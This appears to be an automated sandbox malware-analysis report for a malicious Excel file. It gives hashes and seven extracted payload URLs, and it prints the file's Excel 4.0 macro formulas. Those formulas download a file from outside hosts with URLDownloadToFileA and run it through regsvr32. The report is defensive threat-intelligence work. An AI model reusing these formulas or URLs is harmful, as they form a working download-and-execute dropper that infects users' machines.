Static task
static1
Behavioral task
behavioral1
Sample
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe.xlsx
Resource
win10v2004-20240802-en
General
-
Target
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe
-
Size
46KB
-
MD5
8eccf36e3354f9ddc47dbf2bf7d883d1
-
SHA1
835f2610872b8f592f2f7bad0230bae183c9f6be
-
SHA256
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe
-
SHA512
06cf196819d5263587c27c9f9b94017eefc9af0adc2b8fd6ad32de2cab6cae5708cb26f53a68a77df53beb1083073521628173c8d0335517496dc972451bfa93
-
SSDEEP
768:SCjaoaNkoeFvy1qjVEPxngl76WJAnJwqWijuTop2j2kBM9ahSBO4Vx4SVd:fjaLiZ/hEZg43n9hx2SkBaaQ1x4Sj
Malware Config
Extracted
http://www.ajaxmatters.com/c7g8t/kYHGlphIEPNOImddm1/
http://henrysfreshroast.com/0Rq5zobAZB/
http://185.210.144.149/app/1BKfC3id6jsiH0MC/
http://13cuero.com/wp-admin/ff5srrfTNsCju6sD3/
http://45.76.178.115/sample_sticker/tihOPhaF1l0V/
http://abinsk.com/cgi-bin/fm63rXkG5Y/
http://academicinst.com/wp-includes/44ZVeVQBkeOG/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/kYHGlphIEPNOImddm1/","..\wn.ocx",0,0)
=IF('KEFGK'!E7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/0Rq5zobAZB/","..\wn.ocx",0,0))
=IF('KEFGK'!E9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://185.210.144.149/app/1BKfC3id6jsiH0MC/","..\wn.ocx",0,0))
=IF('KEFGK'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://13cuero.com/wp-admin/ff5srrfTNsCju6sD3/","..\wn.ocx",0,0))
=IF('KEFGK'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://45.76.178.115/sample_sticker/tihOPhaF1l0V/","..\wn.ocx",0,0))
=IF('KEFGK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://45.76.178.115/sample_sticker/tihOPhaF1l0V/","..\wn.ocx",0,0))
=IF('KEFGK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://abinsk.com/cgi-bin/fm63rXkG5Y/","..\wn.ocx",0,0))
=IF('KEFGK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://academicinst.com/wp-includes/44ZVeVQBkeOG/","..\wn.ocx",0,0))
=IF('KEFGK'!E21<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wn.ocx")
=RETURN()
Signatures
Files
-
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe.xlsx office2007